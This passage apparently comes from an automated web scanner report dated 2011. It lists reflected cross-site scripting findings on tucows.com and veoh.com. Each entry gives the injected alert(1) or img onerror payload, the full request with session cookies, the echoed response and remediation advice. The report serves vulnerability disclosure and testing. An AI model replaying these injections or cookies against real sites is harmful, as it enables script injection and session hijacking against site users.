Path:   /software.html

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d91d8"-alert(1)-"32c743300b4 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /software.html?t=689d91d8"-alert(1)-"32c743300b4&pf=win HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVDWt9eDsgAvDivKt0Eex6B0RPBHeE1vxYfjLZMpBZlW7bjlV79Z3QWdkzy6r7qpr%2BTJUX7x9ThxdXpMo6KMFZWyrMA2IUCivRn8fEr2dY2En; path=/
Connection: close
Content-Type: text/html
Content-Length: 55720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/software.html?t=689d91d8"-alert(1)-"32c743300b4&pf=win";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.392. http://www.tucows.com/terms.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc4ae"-alert(1)-"f753e1f604a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms.htmlfc4ae"-alert(1)-"f753e1f604a HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/terms.htmlfc4ae"-alert(1)-"f753e1f604a";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.393. http://www.tucows.com/terms.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ed39"-alert(1)-"d3cf4b9dbed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms.html?2ed39"-alert(1)-"d3cf4b9dbed=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 38731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/terms.html?2ed39"-alert(1)-"d3cf4b9dbed=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.394. http://www.tucows.com/videoegg/ad.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /videoegg/ad.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 436cb"-alert(1)-"c0ec75e5035 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /videoegg436cb"-alert(1)-"c0ec75e5035/ad.html HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmc=163973946; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utmb=163973946; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/videoegg436cb"-alert(1)-"c0ec75e5035/ad.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.395. http://www.tucows.com/videoegg/ad.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /videoegg/ad.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97844"-alert(1)-"e3ce1315cea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /videoegg/ad.html97844"-alert(1)-"e3ce1315cea HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmc=163973946; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utmb=163973946; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/videoegg/ad.html97844"-alert(1)-"e3ce1315cea";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.396. http://www.veoh.com/browse/videos/category/action_adventure [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4b0c<img%20src%3da%20onerror%3dalert(1)>88040cf1d82 was submitted in the REST URL parameter 4. This input was echoed as f4b0c<img src=a onerror=alert(1)>88040cf1d82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventuref4b0c<img%20src%3da%20onerror%3dalert(1)>88040cf1d82 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:50 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=80
Content-Length: 57783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuref4b0c<img src=a onerror=alert(1)>88040cf1d82"}</textarea>
...[SNIP]...

1.397. http://www.veoh.com/browse/videos/category/action_adventure [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d235"><img%20src%3da%20onerror%3dalert(1)>9e252f7871e was submitted in the REST URL parameter 4. This input was echoed as 9d235"><img src=a onerror=alert(1)>9e252f7871e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure9d235"><img%20src%3da%20onerror%3dalert(1)>9e252f7871e HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:46 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=59
Content-Length: 57827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure9d235"><img src=a onerror=alert(1)>9e252f7871e/sort/most viewed" selected="selected">
...[SNIP]...

1.398. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e6c"><img%20src%3da%20onerror%3dalert(1)>96f11e9dd34 was submitted in the REST URL parameter 4. This input was echoed as 71e6c"><img src=a onerror=alert(1)>96f11e9dd34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure71e6c"><img%20src%3da%20onerror%3dalert(1)>96f11e9dd34/watch/v18647177dJ8p2YBE HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=87
Content-Length: 77754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure71e6c"><img src=a onerror=alert(1)>96f11e9dd34/sort/most viewed" selected="selected">
...[SNIP]...

1.399. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8fa41<img%20src%3da%20onerror%3dalert(1)>55c9c937f22 was submitted in the REST URL parameter 4. This input was echoed as 8fa41<img src=a onerror=alert(1)>55c9c937f22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure8fa41<img%20src%3da%20onerror%3dalert(1)>55c9c937f22/watch/v18647177dJ8p2YBE HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=65
Content-Length: 77710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure8fa41<img src=a onerror=alert(1)>55c9c937f22"}</textarea>
...[SNIP]...

1.400. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfc58'%3bc01f25840e4 was submitted in the REST URL parameter 6. This input was echoed as cfc58';c01f25840e4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBEcfc58'%3bc01f25840e4 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:26 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=72
Content-Length: 94329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'd18561bc886031d73754768a00e1c177',
'v18647177dJ8p2YBEcfc58';c01f25840e4'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.401. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v189741093prNNZM5

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbdf3"><img%20src%3da%20onerror%3dalert(1)>42b09b361cc was submitted in the REST URL parameter 4. This input was echoed as fbdf3"><img src=a onerror=alert(1)>42b09b361cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurefbdf3"><img%20src%3da%20onerror%3dalert(1)>42b09b361cc/watch/v189741093prNNZM5 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:16 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
